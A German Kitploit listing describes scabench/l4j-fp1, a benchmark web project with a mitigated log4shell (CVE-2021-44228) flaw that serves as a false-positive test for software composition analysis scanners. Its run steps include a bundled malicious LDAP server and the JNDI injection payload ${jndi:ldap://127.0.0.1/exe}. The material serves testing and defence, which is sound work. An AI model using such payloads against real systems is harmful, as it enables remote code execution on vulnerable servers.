Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
l4j-fp1 — JEE-Webprojekt mit bereinigter log4shell (CVE-2021-44228)-Schwachstelle | Kitploit
Tools/GitHubGitHub/scabench/l4j-fp1
SchwachstellenanalyseCode-AnalyseExploitationWebsicherheitLieferkettensicherheitLernen & Bildung
GitHubscabench/l4j-fp1

l4j-fp1

JEE-Webprojekt mit bereinigter log4shell (CVE-2021-44228)-Schwachstelle

Repository anzeigen
5vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

log4shell Falsch-Positiv

Dies ist ein einfaches Webprojekt mit einer bereinigten log4shell-Schwachstelle. Für eine unbereinigte Version siehe https://github.com/scabench/l4j-tp1/. Das Projekt definiert einen einfachen scabench.HelloWorldService-Get-Service, der einen Klartext-String hello world zurückgibt. Der Service erwartet keine Parameter, und wenn Parameter auftreten, wird ein Fehler protokolliert.

Die anfällige Abhängigkeit ist org.apache.logging.log4j:log4j-core:2.14.1, die Schwachstelle ist CVE-2021-44228.

Bereinigung

Das Projekt verwendet einen von Amazon erstellten Agenten, als log4shell auftauchte und noch kein Patch verfügbar war. Der Agent deaktiviert die anfällige Klasse org.apache.logging.log4j.core.lookup.JndiLookup.

Die Verwendung des Agenten wird erzwungen, indem der Agent dynamisch installiert (auch bekannt als angehängt) wird, wenn scabench.HelloWorldService geladen wird (im statischen Block der Klasse), wenn dies fehlschlägt, stürzt die Anwendung ab. Dies erfordert, dass die JVM das Selbstanhängen von Agenten aktiviert.

Ausführen der Anwendung

Tool herunterladen
  1. JVM-Agent-Selbstanhängung aktivieren: export MAVEN_OPTS="-Djdk.attach.allowAttachSelf=true"
  2. den eingebetteten Webserver starten: mvn jetty:run
  3. den enthaltenen LDAP-Server starten: java -jar dodgy-ldap-server.jar (der anfällige Code lädt Java-Code von diesem Server herunter)
  4. den Browser auf http://localhost:8080/ richten; diese Seite enthält ein vorausgefülltes Formular mit einer schädlichen Nutzlast ${jndi:ldap://127.0.0.1/exe}
  5. dieses Formular absenden
  6. Dadurch wird KEINE Datei foo auf dem Server erstellt (wie es die un-bereinigte Version) tut)

Beachten Sie, dass beim Ausführen der Anwendung die folgende Zeile auf der Konsole erscheint:

Transforming org/apache/logging/log4j/core/lookup/JndiLookup .

Nachweis der Bereinigung mittels eines Tests

Dies erfordert Unix oder macOS. Es ist einfach, dieses Projekt auf Windows zu portieren. Es wird ein Unit-Test bereitgestellt, um die Schwachstelle zu demonstrieren; das Setup ist das gleiche wie in https://github.com/scabench/l4j-tp1/. Aufgrund der Bereinigung schlägt der Test nun fehl.

Durchführen von Software Composition Analyses

Es gibt mehrere sh-Skripte, um verschiedene Analysen durchzuführen; Ergebnisberichte finden Sie in scan-results.

Erstellen der SBOM

Die pom.xml enthält ein Plugin, um eine SBOM im CycloneDX-Format zu erstellen. Führen Sie dazu mvn cyclonedx:makePackageBom aus. Die SBOM befindet sich in target/ im json- und xml-Format.